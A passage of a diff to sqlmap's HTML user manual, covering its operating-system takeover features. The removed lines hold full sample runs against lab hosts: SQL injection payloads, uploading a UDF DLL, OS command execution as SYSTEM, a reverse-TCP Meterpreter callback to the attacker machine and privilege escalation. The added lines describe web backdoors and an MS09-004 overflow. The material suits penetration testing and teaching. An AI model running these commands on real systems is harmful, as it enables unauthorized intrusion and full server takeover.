-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:35] [INFO] retrieved: w2k3dev\postgres
-command standard output:    'w2k3dev\postgres'
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
-  --os-cmd "whoami" --union-use -v 1
-
-[...]
-[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
-technique
-[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name'
-[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql 
-injection vulnerability
-[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' 
-by appending a false condition after the parameter value
-[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband 
-sql injection vulnerability
-valid union:    'http://172.16.213.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
-ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv'
-
-[hh:mm:58] [INFO] testing stacked queries support on parameter 'name'
-[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name'
-[hh:mm:03] [INFO] testing if current user is DBA
-[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:09] [INFO] xp_cmdshell extended procedure is available
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:11] [INFO] the SQL query provided returns 1 entries
-command standard output:
----
-nt authority\network service
----
+[hh:mm:19] [INFO] cleaning up the database management system
+do you want to remove UDF 'sys_eval'? [Y/n] y
+do you want to remove UDF 'sys_exec'? [Y/n] y
+[hh:mm:23] [INFO] database management system cleanup finished
+[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can 
+only be deleted manually
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
 
 <P>It is also possible to simulate a real shell where you can type as many
 arbitrary commands as you wish. The option is <CODE>-</CODE><CODE>-os-shell</CODE> and has
-the same TAB completion and history functionalities like
-<CODE>-</CODE><CODE>-sql-shell</CODE>.</P>
+the same TAB completion and history functionalities that
+<CODE>-</CODE><CODE>-sql-shell</CODE> has.</P>
 
-<P>Example on a <B>MySQL 5.0.67</B> target:</P>
+<P>Where stacked queries has not been identified on the web application
+(e.g. PHP or ASP with back-end database management system being MySQL) and
+the DBMS is MySQL, it is still possible to abuse the <CODE>SELECT</CODE>
+clause's <CODE>INTO OUTFILE</CODE> to create a web backdoor in a writable
+folder within the web server document root and still get command
+execution assuming the back-end DBMS and the web server are hosted on the
+same server.
+sqlmap supports this technique and allows the user to provide a
+comma-separated list of possible document root sub-folders where try to
+upload the web file stager and the subsequent web backdoor. Also, sqlmap
+has its own tested web file stagers and backdoors for the following
+languages:</P>
 <P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
-  --os-shell -v 2
-
-[...]
-[hh:mm:36] [INFO] the back-end DBMS is MySQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:36] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:36] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32))
-[hh:mm:36] [INFO] retrieved: 5.0.67
-[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds
-[hh:mm:37] [DEBUG] query: SELECT SLEEP(5)
-[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
-[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
-[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32))
-[hh:mm:42] [INFO] retrieved: C
-[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds
-[hh:mm:42] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:42] [DEBUG] cleaning up the database management system
-[hh:mm:42] [DEBUG] removing support tables
-[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:42] [INFO] testing if current user is DBA
-[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=
-(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END)
-[hh:mm:42] [INFO] retrieved: 1
-[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds
-[hh:mm:43] [INFO] checking if sys_exec UDF already exist
-[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
-CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) 
-THEN 1 ELSE 0 END)
-[hh:mm:43] [INFO] retrieved: 0
-[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
-[hh:mm:43] [INFO] checking if sys_eval UDF already exist
-[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name=
-CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) 
-THEN 1 ELSE 0 END)
-[hh:mm:43] [INFO] retrieved: 0
-[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds
-[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique
-[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to
-[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob)
-[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value
-[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the 
-support table
-[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table
-[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...])
-[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...])
-[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...])
-[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...])
-[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll'
-[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll'
-[hh:mm:44] [DEBUG] cleaning up the database management system
-[hh:mm:44] [DEBUG] removing support tables
-[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file
-[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec
-[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll'
-[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file
-[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval
-[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME 
-'libsqlmapudftxxgk.dll'
-[hh:mm:44] [DEBUG] creating a support table to write commands standard output to
-[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput
-[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
-[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
-operating system command execution
-[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
-os-shell> whoami
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami'))
-[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM 
-sqlmapoutput
-[hh:mm:41] [INFO] retrieved: nt authority\system
-[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds
-[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput
-command standard output:    'nt authority\system'
-
-os-shell> [TAB TAB]
-copy         del          dir          echo         md           mem          move         
-net          netstat -na  ver          whoami       xcopy        
-
-os-shell> exit
-[hh:mm:51] [INFO] cleaning up the database management system
-[hh:mm:51] [DEBUG] removing support tables
-[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] n
-do you want to remove sys_eval UDF? [Y/n] n
-[hh:mm:04] [INFO] database management system cleanup finished
-[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system 
-can only be deleted manually
-</PRE>
-</CODE></BLOCKQUOTE>
+<UL>
+<LI>ASP</LI>
+<LI>ASP.NET</LI>
+<LI>JSP</LI>
+<LI>PHP</LI>
+</UL>
 </P>
 
-<P>Now run it again, but specifying the <CODE>-</CODE><CODE>-union-use</CODE> to retrieve the
-command standard output quicker, via UNION based SQL injection, when the
-parameter is affected also by inband SQL injection vulnerability:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.131/sqlmap/mysql/get_int.aspx?id=1" \
-  --os-shell -v 2 --union-use
 
-[...]
-[hh:mm:16] [INFO] the back-end DBMS is MySQL
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: MySQL >= 5.0.0
+<H3>Out-of-band stateful connection: Meterpreter &amp; friends</H3>
 
-[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing 
-technique
-[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id'
-[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection 
-vulnerability
-valid union:    'http://172.16.213.131/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT 
-NULL, NULL, NULL# AND 528=528'
-
-[hh:mm:16] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:16] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:16] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
-MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173
-[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:16] [DEBUG] query: SELECT SLEEP(5)
-[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text)
-[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
-[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),
-MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574
-[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:21] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:21] [DEBUG] cleaning up the database management system
-[hh:mm:21] [DEBUG] removing support tables
-[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:21] [INFO] testing if current user is DBA
-[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE 
-WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 
-1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19
-[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:21] [INFO] checking if sys_exec UDF already exist
-[hh:mm:21] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
-((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=
-CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
-AND 4900=4900
-[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds
-sys_exec UDF already exists, do you want to overwrite it? [y/N] n
-[hh:mm:24] [INFO] checking if sys_eval UDF already exist
-[hh:mm:24] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN 
-((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=
-CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# 
-AND 4437=4437
-[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds
-sys_eval UDF already exists, do you want to overwrite it? [y/N] n
-[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested
-[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested
-[hh:mm:25] [DEBUG] creating a support table to write commands standard output to
-[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput
-[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext)
-[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for 
-operating system command execution
-[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
-os-shell> ipconfig
-do you want to retrieve the command standard output? [Y/n] 
-[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig'))
-[hh:mm:29] [DEBUG] query:  UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST
-(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND 
-7106=7106
-[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds
-[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput
-command standard output:
----
-
-Windows IP Configuration
-
-
-Ethernet adapter Local Area Connection 2:
-
-   Connection-specific DNS Suffix  . : localdomain
-   IP Address. . . . . . . . . . . . : 172.16.213.131
-   Subnet Mask . . . . . . . . . . . : 255.255.255.0
----Default Gateway . . . . . . . . . : 172.16.213.1
-
-os-shell> exit
-[hh:mm:41] [INFO] cleaning up the database management system
-[hh:mm:41] [DEBUG] removing support tables
-[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile
-[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput
-do you want to remove sys_exec UDF? [Y/n] n
-do you want to remove sys_eval UDF? [Y/n] n
-[hh:mm:54] [INFO] database management system cleanup finished
-[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system 
-can only be deleted manually
-</PRE>
-</CODE></BLOCKQUOTE>
-</P>
-
-<P>As you can see from this second example, sqlmap firstly check if the two
-user-defined functions are already created, if so, it asks the user if he
-wants to recreate them or keep them and save time.</P>
-
-
-<H3>Prompt for an out-of-band shell, Meterpreter or VNC</H3>
-
-<P>Options: <CODE>-</CODE><CODE>-os-pwn</CODE>, <CODE>-</CODE><CODE>-priv-esc</CODE>, <CODE>-</CODE><CODE>-msf-path</CODE> and <CODE>-</CODE><CODE>-tmp-path</CODE></P>
+<P>Switches: <CODE>-</CODE><CODE>-os-pwn</CODE>, <CODE>-</CODE><CODE>-os-smbrelay</CODE>,
+<CODE>-</CODE><CODE>-os-bof</CODE>, <CODE>-</CODE><CODE>-priv-esc</CODE>,
+<CODE>-</CODE><CODE>-msf-path</CODE> and <CODE>-</CODE><CODE>-tmp-path</CODE></P>
 
 <P>It is possible to establish an <B>out-of-band stateful TCP connection
-between the user machine and the database server</B> underlying operating
-system. This channel can be an interactive command prompt, a Meterpreter
-session or a graphical user interface (VNC) session as per user's choice.
-sqlmap relies on Metasploit to create the shellcode and implements four
+between the attacker machine and the database server</B> underlying
+operating system when the back-end database management system is either
+MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the
+needed privileges to abuse database specific functionalities and
+architectural weaknesses.
+This channel can be an interactive command prompt, a Meterpreter session
+or a graphical user interface (VNC) session as per user's choice.</P>
+
+<P>sqlmap relies on Metasploit to create the shellcode and implements four
 different techniques to execute it on the database server. These
 techniques are:
 <UL>
 <LI>Database <B>in-memory execution of the Metasploit's shellcode</B>
 via sqlmap own user-defined function <CODE>sys_bineval()</CODE>. Supported on
-MySQL and PostgreSQL.</LI>
+MySQL and PostgreSQL - switch <CODE>-</CODE><CODE>-os-pwn</CODE>.</LI>
 <LI>Upload and execution of a Metasploit's <B>stand-alone payload
 stager</B> via sqlmap own user-defined function <CODE>sys_exec()</CODE> on
 MySQL and PostgreSQL or via <CODE>xp_cmdshell()</CODE> on Microsoft SQL
-Server.</LI>
+Server - switch <CODE>-</CODE><CODE>-os-pwn</CODE>.</LI>
 <LI>Execution of Metasploit's shellcode by performing a <B>SMB
 reflection attack</B> (
 <A HREF="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx">MS08-068</A>) with a UNC path request from the database server to
-the user's machine where the Metasploit <CODE>smb_relay</CODE> server exploit
-runs.</LI>
+the attacker's machine where the Metasploit <CODE>smb_relay</CODE> server
+exploit listens. Supported when running sqlmap with high privileges
+(<CODE>uid=0</CODE>) on Linux/Unix and the target DBMS runs as Administrator
+on Windows - switch <CODE>-</CODE><CODE>-os-smbrelay</CODE>.</LI>
 <LI>Database in-memory execution of the Metasploit's shellcode by
 exploiting <B>Microsoft SQL Server 2000 and 2005
 <CODE>sp_replwritetovarbin</CODE> stored procedure heap-based buffer
 overflow</B> (
-<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx">MS09-004</A>) with automatic DEP bypass.</LI>
+<A HREF="http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx">MS09-004</A>). sqlmap has its own exploit to trigger the
+vulnerability with automatic DEP memory protection bypass, but it relies
+on Metasploit to generate the shellcode to get executed upon successful
+exploitation - switch <CODE>-</CODE><CODE>-os-bof</CODE>.</LI>
 </UL>
 </P>
 
-<P>Note that this feature is not supported by sqlmap running on Windows
-because it relies on Metasploit's <CODE>msfcli</CODE> which is not
-available for Windows.</P>
-
 <P>These techniques are detailed in the white paper
-<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> and in the
+<A HREF="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857">Advanced SQL injection to operating system full control</A> and in the
 slide deck 
 <A HREF="http://www.slideshare.net/inquis/expanding-the-control-over-the-operating-system-from-the-database">Expanding the control over the operating system from the database</A>.</P>
 
-<P>Example on a <B>MySQL 5.1</B> target:</P>
+<P>Example against a MySQL target:</P>
 <P>
 <BLOCKQUOTE><CODE>
 <PRE>
-$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mysql/get_int_51.aspx?id=1" \
-  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit
+$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
+  --os-pwn -v 1 --msf-path /tmp/metasploit
 
 [...]
-web server operating system: Windows 2003 or 2008
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:09] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:09] [INFO] detecting back-end DBMS version from its banner
-[hh:mm:09] [INFO] retrieved: 5.1.30
-[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system
-[hh:mm:18] [INFO] retrieved: C
-[hh:mm:19] [INFO] the back-end DBMS operating system is Windows
-[hh:mm:19] [INFO] testing if current user is DBA
-[hh:mm:19] [INFO] retrieved: 1
-[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist
-[hh:mm:20] [INFO] retrieved: 0
-[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist
-[hh:mm:21] [INFO] retrieved: 0
-[hh:mm:21] [INFO] retrieving MySQL base directory absolute path
-[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\
-[hh:mm:46] [WARNING] this will only work if the database administrator created manually 
-the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder
-[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file
-[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file
-how do you want to execute the Metasploit shellcode on the back-end database underlying 
-operating system?
-[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
-[2] Stand-alone payload stager (file system way)
-> 1
-[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode 
-which connection type do you want to use?
-[1] Reverse TCP: Connect back from the database host to this machine (default)
-[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
-between the specified and 65535
-[3] Bind TCP: Listen on the database host for a connection
-> 1
-which is the local address? [172.16.213.1] 
-which local port number do you want to use? [47776] 
-which payload do you want to use?
-[1] Meterpreter (default)
-[2] Shell
-[3] VNC
-> 1
-[hh:mm:55] [INFO] creation in progress .............................................. done
-[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[*] Please wait while we load the module tree...
-[*] Started reverse handler on 172.16.213.1:47776 
-[*] Starting the payload handler...
-[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait..
-[*] Sending stage (748032 bytes)
-[*] Meterpreter session 1 opened (172.16.213.1:47776 -> 172.16.213.128:2176)
-
-meterpreter > Loading extension espia...success.
-meterpreter > Loading extension incognito...success.
-meterpreter > Loading extension priv...success.
-meterpreter > Loading extension sniffer...success.
-meterpreter > Computer: W2K3DEV
-OS      : Windows .NET Server (Build 3790, Service Pack 2).
-Arch    : x86
-Language: en_US
-meterpreter > Server username: NT AUTHORITY\SYSTEM
-meterpreter > ipconfig
-
-MS TCP Loopback interface
-Hardware MAC: 00:00:00:00:00:00
-IP Address  : 127.0.0.1
-Netmask     : 255.0.0.0
-
-
-
-VMware Accelerated AMD PCNet Adapter #2
-Hardware MAC: 00:0c:29:86:69:1b
-IP Address  : 172.16.213.128
-Netmask     : 255.255.255.0
-
-
-meterpreter > exit
-
-[hh:mm:52] [INFO] cleaning up the database management system
-do you want to remove UDF 'sys_bineval'? [Y/n] 
-do you want to remove UDF 'sys_exec'? [Y/n] 
-[hh:mm:54] [INFO] database management system cleanup finished
-[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related 
-files in the temporary folder saved on the file system can only be deleted manually
+TODO
 </PRE>
 </CODE></BLOCKQUOTE>
 </P>
@@ -5177,527 +2489,44 @@ runs as a low-privileged user <CODE>postgres</CODE> on both Windows and Linux.
 Microsoft SQL Server 2000 by default runs as <CODE>SYSTEM</CODE>, whereas
 Microsoft SQL Server 2005 and 2008 run most of the times as <CODE>NETWORK
 SERVICE</CODE> and sometimes as <CODE>LOCAL SERVICE</CODE>.</P>
+
 <P>It is possible to provide sqlmap with the <CODE>-</CODE><CODE>-priv-esc</CODE>
-option to perform a <B>database process' user privilege escalation</B>
+switch to perform a <B>database process' user privilege escalation</B>
 via Metasploit's <CODE>getsystem</CODE> command which include, among others,
 the 
 <A HREF="http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html">kitrap0d</A> technique (
-<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>) or via 
-<A HREF="http://www.argeniss.com/research/TokenKidnapping.pdf">Windows Access Tokens kidnapping</A> by using Meterpreter's
-<A HREF="http://sourceforge.net/projects/incognito/">incognito</A> extension.</P>
-
-<P>Example on a <B>Microsoft SQL Server 2005 Service Pack 0</B> running as
-<CODE>NETWORK SERVICE</CODE> on the target:</P>
-<P>
-<BLOCKQUOTE><CODE>
-<PRE>
-$ python sqlmap.py -u "http://172.16.213.128/sqlmap/mssql/iis/get_int.asp?id=1" \
-  --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc
-
-[...]
-web server operating system: Windows 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: Microsoft SQL Server 2005
-
-[hh:mm:47] [INFO] testing stacked queries support on parameter 'id'
-[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id'
-[hh:mm:52] [INFO] testing if current user is DBA
-[hh:mm:52] [INFO] retrieved: 1
-[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait..
-[hh:mm:01] [INFO] xp_cmdshell extended procedure is available
-[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager
-which connection type do you want to use?
-[1] Reverse TCP: Connect back from the database host to this machine (default)
-[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports 
-between the specified and 65535
-[3] Bind TCP: Listen on the database host for a connection
-> 1
-which is the local address? [172.16.213.1] 
-which local port number do you want to use? [44780] 
-[hh:mm:52] [INFO] forcing Metasploit payload to Meterpreter because it is the only payload 
-that can be used to escalate privileges, either via 'incognito' extension or via 
-'getsystem' command
-which payload encoding do you want to use?
-[1] No Encoder
-[2] Alpha2 Alphanumeric Mixedcase Encoder
-[3] Alpha2 Alphanumeric Uppercase Encoder
-[4] Avoid UTF8/tolower
-[5] Call+4 Dword XOR Encoder
-[6] Single-byte XOR Countdown Encoder
-[7] Variable-length Fnstenv/mov Dword XOR Encoder
-[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
-[9] Non-Alpha Encoder
-[10] Non-Upper Encoder
-[11] Polymorphic XOR Additive Feedback Encoder (default)
-[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
-[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
-> 
-[hh:mm:53] [INFO] creation in progress ..... done
-[hh:mm:58] [INFO] compression in progress . done
-[hh:mm:59] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/tmpmqyws.exe'
-[hh:mm:05] [INFO] running Metasploit Framework 3 command line interface locally, wait..
-[*] Please wait while we load the module tree...
-[*] Started reverse handler on 172.16.213.1:44780 
-[*] Starting the payload handler...
-[hh:mm:31] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
-[*] Sending stage (748032 bytes)
-[*] Meterpreter session 1 opened (172.16.213.1:44780 -> 172.16.213.128:2185)
-
-meterpreter > 
-[hh:mm:34] [INFO] trying to escalate privileges using Meterpreter 'getsystem' command which 
-tries different techniques, including kitrap0d
-[hh:mm:34] [INFO] displaying the list of Access Tokens availables. Choose which user you 
-want to impersonate by using incognito's command 'impersonate_token' if 'getsystem' did not 
-success to elevate privileges
-Loading extension espia...success.
-meterpreter > Loading extension incognito...success.
-meterpreter > Loading extension priv...success.
-meterpreter > Loading extension sniffer...success.
-meterpreter > Computer: W2K3DEV
-OS      : Windows .NET Server (Build 3790, Service Pack 2).
-Arch    : x86
-Language: en_US
-meterpreter > Server username: NT AUTHORITY\NETWORK SERVICE
-meterpreter > ...got system (via technique 4).
-meterpreter > 
-Delegation Tokens Available
-========================================
-NT AUTHORITY\LOCAL SERVICE
-NT AUTHORITY\NETWORK SERVICE
-NT AUTHORITY\SYSTEM
-W2K3DEV\Administrator
-W2K3DEV\IUSR_W2K3STENSP0
-W2K3DEV\postgres
-
-Impersonation Tokens Available
-========================================
-NT AUTHORITY\ANONYMOUS LOGON
-
-meterpreter > Server username: NT AUTHORITY\SYSTEM
-meterpreter > ipconfig
-
-MS TCP Loopback interface
-Hardware MAC: 00:00:00:00:00:00
-IP Address  : 127.0.0.1
-Netmask     : 255.0.0.0
+<A HREF="http://www.microsoft.com/technet/security/bulletin/ms10-015.mspx">MS10-015</A>).</P>
 
 
-
-VMware Accelerated AMD PCNet Adapter #2
-Hardware MAC: 00:0c:29:86:69:1b
-IP Address  : 172.16.213.128
-Netmask     : 255.255.255.0
-
-
-meterpreter > getuid
-Server username: NT AUTHORITY\SYSTEM
-meterpreter > exit
-
